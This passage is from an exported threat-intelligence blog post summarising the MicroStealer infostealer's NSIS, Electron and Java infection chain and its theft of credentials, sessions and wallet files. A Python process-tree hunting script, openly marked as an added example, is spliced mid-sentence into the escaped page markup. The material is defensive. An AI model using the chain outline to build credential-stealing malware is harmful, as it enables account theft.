TI&nbsp;Lookup<\/em><\/figcaption><\/figure><\/div>\n\n\n<h2 class=\"wp-block-heading\">8.&nbsp;MicroStealer: A Fast-Spreading Infostealer with Limited Detection&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/any.run\/cybersecurity-blog\/microstealer-technical-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">Check technical analysis<\/a>&nbsp;<\/p>\n\n\n\n<p>ANY.RUN analysts found&nbsp;<strong>MicroStealer<\/strong>, a fast-spreading infostealer that gained traction despite limited public detection. In observed activity, the malware appeared in&nbsp;<strong>40+ sandbox sessions in less than a month<\/strong>, using a multi-stage chain to steal credentials, session data, screenshots, and wallet files.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/d59c90ed-820e-4f3d-be47-77bd997835aa\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">See the full execution chain<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"555\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-11-at-23.53.40-2048x1110-1-1024x555.png\" alt=\"First\u00a0observed\u00a0analysis\u00a0session\u00a0with\u00a0MicroStealer\" class=\"wp-image-19739\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-11-at-23.53.40-2048x1110-1-1024x555.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-11-at-23.53.40-2048x1110-1-300x163.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-11-at-23.53.40-2048x1110-1-768x416.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-11-at-23.53.40-2048x1110-1-1536x833.png 1536w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-11-at-23.53.40-2048x1110-1-370x201.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-11-at-23.53.40-2048x1110-1-270x146.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-11-at-23.53.40-2048x1110-1-740x401.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-11-at-23.53.40-2048x1110-1.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>First&nbsp;observed&nbsp;analysis&nbsp;session&nbsp;with&nbsp;MicroStealer<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Inside the sandbox, analysts were able to quickly confirm how the threat unfolds and what data it targets. This kind of visibility helps security teams move from an unclear file to a confident verdict faster, reducing review time and lowering the chance of missed credential theft.&nbsp;<\/p>\n\n\n\n<p>How the attack unfolds:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>NSIS installer<\/strong>&nbsp;delivers the&nbsp;initial&nbsp;payload&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Electron loader<\/strong>&nbsp;requests elevated privileges and launches the next stage&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Java module<\/strong>&nbsp;executes the main stealer logic&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Browser credentials, session data, screenshots, and wallet files are collected&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Stolen data is sent to attacker-controlled infrastructure&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>What makes&nbsp;MicroStealer&nbsp;notable is not only what it steals, but how it delays confident detection. 
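The delivery steps listed above can be turned into a process-tree hunting rule. The Python below is an added example, not ANY.RUN's detection logic: it walks constructed EDR-style process events (paths, names and the elevated flag are invented for this example) and reports java.exe/javaw.exe launches whose ancestry matches the NSIS installer → elevated Electron loader → Java pattern. The only facts it leans on are that /S is the NSIS silent-install switch and that electron-builder's NSIS installers default to a per-user directory under %LOCALAPPDATA%\Programs; treat both as assumptions to adjust for your environment.

```python
import ntpath
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str      # full image path as the EDR reports it
    cmdline: str
    elevated: bool  # runs at high integrity, i.e. the UAC prompt was accepted


# Constructed EDR-style process events; a realistic feed would carry thousands.
EVENTS = [
    Proc(400, 100, r"C:\Windows\explorer.exe", "explorer.exe", False),
    # Stage 1: NSIS installer run silently from Downloads
    Proc(812, 400, r"C:\Users\u\Downloads\SecureViewer-Setup.exe", "SecureViewer-Setup.exe /S", False),
    # Stage 2: Electron loader installed per-user, now running elevated
    Proc(901, 812, r"C:\Users\u\AppData\Local\Programs\SecureViewer\SecureViewer.exe", "SecureViewer.exe", True),
    # Stage 3: a bundled JRE executes the stealer module
    Proc(955, 901, r"C:\Users\u\AppData\Local\Programs\SecureViewer\resources\jre\bin\javaw.exe",
         "javaw.exe -jar core.jar", True),
    # Same loader started later from its own shortcut: the installer is gone from the chain
    Proc(1990, 400, r"C:\Users\u\AppData\Local\Programs\SecureViewer\SecureViewer.exe", "SecureViewer.exe", True),
    Proc(2000, 1990, r"C:\Users\u\AppData\Local\Programs\SecureViewer\resources\jre\bin\javaw.exe",
         "javaw.exe -jar core.jar", True),
    # Benign: a developer running the system JDK from a terminal
    Proc(1200, 400, r"C:\Windows\System32\WindowsTerminal.exe", "wt.exe", False),
    Proc(1210, 1200, r"C:\Program Files\Java\jdk-21\bin\java.exe", "java.exe -jar app.jar", False),
]

JAVA_IMAGES = {"java.exe", "javaw.exe"}


def is_installer(p: Proc) -> bool:
    """Installer launched from a download/staging location; /S is the NSIS silent switch."""
    low = p.image.lower()
    staged = "\\downloads\\" in low or "\\temp\\" in low
    return staged and ("setup" in low or "install" in low or " /s" in p.cmdline.lower())


def is_user_profile_app(p: Proc) -> bool:
    """Per-user install location that NSIS-built Electron apps default to (assumption)."""
    low = p.image.lower()
    return "\\appdata\\local\\programs\\" in low or "\\appdata\\roaming\\" in low


def ancestors(p: Proc, by_pid: dict, max_depth: int = 4) -> list:
    """Walk up the process tree, bounded so a broken ppid link cannot loop forever."""
    chain, cur = [], p
    for _ in range(max_depth):
        cur = by_pid.get(cur.ppid)
        if cur is None:
            break
        chain.append(cur)
    return chain


def hunt_java_loaders(events: list) -> list:
    """Return (java_pid, confidence, [image names from child to root]) for suspicious Java launches."""
    by_pid = {p.pid: p for p in events}
    hits = []
    for p in events:
        if ntpath.basename(p.image).lower() not in JAVA_IMAGES:
            continue
        if "\\program files" in p.image.lower():
            continue  # system-wide JRE/JDK: out of scope for this rule
        chain = ancestors(p, by_pid)
        loader = next((a for a in chain if is_user_profile_app(a) and a.elevated), None)
        if loader is None:
            continue
        confidence = "high" if any(is_installer(a) for a in chain) else "medium"
        hits.append((p.pid, confidence, [ntpath.basename(x.image) for x in [p] + chain]))
    return hits


if __name__ == "__main__":
    for hit in hunt_java_loaders(EVENTS):
        print(hit)
```

The second hit shows the gap a single parent-child rule leaves: once the loader is started again from its own shortcut, the installer is no longer in the chain, so the rule falls back to reporting an elevated per-user Electron app spawning a bundled JRE, at lower confidence rather than not at all.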
The layered&nbsp;<strong>NSIS \u2192 Electron \u2192 Java<\/strong>&nbsp;execution chain, combined with obfuscation and anti-analysis checks, makes the malware harder to understand during early triage.&nbsp;<\/p>\n\n\n\n<p>To review related sandbox analyses and broader activity, use the following&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\">TI&nbsp;Lookup<\/a>&nbsp;query:&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/intelligence.any.run\/analysis\/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktotilookup#{%22query%22:%22threatName:%5C%22microstealer%5C%22%22,%22dateRange%22:180}\" target=\"_blank\" rel=\"noreferrer noopener\">threatName:&#8221;microstealer&#8221;<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"565\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image12-2048x1129-1-1024x565.png\" alt=\"Relevant sandbox sessions with\u00a0MicroStealer\" class=\"wp-image-19740\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image12-2048x1129-1-1024x565.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image12-2048x1129-1-300x165.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image12-2048x1129-1-768x423.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image12-2048x1129-1-1536x847.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image12-2048x1129-1-370x204.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image12-2048x1129-1-270x149.png 270w, 
https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image12-2048x1129-1-740x408.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image12-2048x1129-1.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>ANY.RUN&nbsp;TI&nbsp;Lookup&nbsp;demonstrates&nbsp;relevant sandbox sessions with&nbsp;MicroStealer<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>For organizations, this&nbsp;risk goes beyond a single infected endpoint. Stolen browser credentials and active sessions can give attackers access to SaaS apps, internal systems, and cloud services, increasing the chance of account compromise and broader intrusion.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\"><span class=\"highlight\"> 64%\u00a0of Fortune\u00a0500 <\/span>companies\u00a0rely on ANY.RUN\n<br> to strengthen their SOC operations\n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=major-cyber-attacks-march-2026&#038;utm_term=010426&#038;utm_content=linktoenterprise#contact-sales\" rel=\"noopener\" target=\"_blank\">\nIntegrate in your SOC\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: 
#FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<h2 class=\"wp-block-heading\">About ANY.RUN&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN<\/a>, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams detect threats earlier, investigate incidents faster, and build stronger response workflows. With&nbsp;<a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">Interactive Sandbox<\/a>,&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\">Threat Intelligence&nbsp;Lookup<\/a>, and&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-feeds\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktotifeedslanding\" target=\"_blank\" rel=\"noreferrer noopener\">Threat Intelligence Feeds<\/a>, the company gives SOC and MSSP teams the visibility and context they need to move from alert to confident decision more quickly.&nbsp;&nbsp;<\/p>\n\n\n\n<p>Today, more than <strong>15,000 organizations<\/strong> and <strong>600,000 security professionals<\/strong> worldwide rely on ANY.RUN. 
The company is <a href=\"https:\/\/any.run\/compliance\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktocompliance\" target=\"_blank\" rel=\"noreferrer noopener\">SOC 2 Type II certified<\/a>, reflecting its focus on strong security controls and customer data protection.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>March 2026 brought a wave of cyber attacks that reflected how quickly modern threats can move from subtle early signals to serious business impact. ANY.RUN analysts identified and explored several major threats this month, exposing phishing campaigns, stealthy malware, payment-skimming activity, and resilient botnet infrastructure affecting organizations across industries. From Microsoft 365 token abuse and [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":18895,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[57,34,40],"class_list":["post-19709","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-malware-analysis","tag-anyrun","tag-malware-analysis","tag-malware-behavior"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.10 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Major Cyber Attacks in March 2026: EvilTokens, Magecart &amp; More<\/title>\n<meta name=\"description\" content=\"Explore the major cyber attacks in March 2026, including EvilTokens OAuth phishing, RUTSSTAGER, Magecart, MicroStealer, Kamasers, and more.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"ANY.RUN\" 
\/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"16 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/\"},\"author\":{\"name\":\"ANY.RUN\",\"@id\":\"https:\/\/any.run\/\"},\"headline\":\"Major Cyber Attacks in March 2026: OAuth Phishing,\u00a0SVG Smuggling,\u00a0Magecart, and More\u00a0\",\"datePublished\":\"2026-04-01T12:08:31+00:00\",\"dateModified\":\"2026-04-03T13:10:40+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/\"},\"wordCount\":3102,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"keywords\":[\"ANYRUN\",\"malware analysis\",\"malware behavior\"],\"articleSection\":[\"Malware Analysis\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/\",\"name\":\"Major Cyber Attacks in March 2026: EvilTokens, Magecart & More\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/\"},\"datePublished\":\"2026-04-01T12:08:31+00:00\",\"dateModified\":\"2026-04-03T13:10:40+00:00\",\"description\":\"Explore the major cyber attacks in March 2026, including EvilTokens OAuth phishing, RUTSSTAGER, Magecart, MicroStealer, Kamasers, and 
more.\",\"breadcrumb\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Malware Analysis\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Major Cyber Attacks in March 2026: OAuth Phishing,\u00a0SVG Smuggling,\u00a0Magecart, and More\u00a0\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN&#039;s Cybersecurity Blog\",\"description\":\"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.\",\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/any.run\/?s={search_term_string}\"},\"query-input\":\"required 
name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN\",\"url\":\"https:\/\/any.run\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"width\":1,\"height\":1,\"caption\":\"ANY.RUN\"},\"image\":{\"@id\":\"https:\/\/any.run\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/www.any.run\/\",\"https:\/\/twitter.com\/anyrun_app\",\"https:\/\/www.linkedin.com\/company\/30692044\",\"https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/c4ce3a6c672056b4a8cd6b0110782215?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/c4ce3a6c672056b4a8cd6b0110782215?s=96&d=mm&r=g\",\"caption\":\"ANY.RUN\"},\"url\":\"https:\/\/any.run\/cybersecurity-blog\/author\/a-bespalova\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Major Cyber Attacks in March 2026: EvilTokens, Magecart & More","description":"Explore the major cyber attacks in March 2026, including EvilTokens OAuth phishing, RUTSSTAGER, Magecart, MicroStealer, Kamasers, and more.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/","twitter_misc":{"Written by":"ANY.RUN","Est. 
reading time":"16 minutes"}}}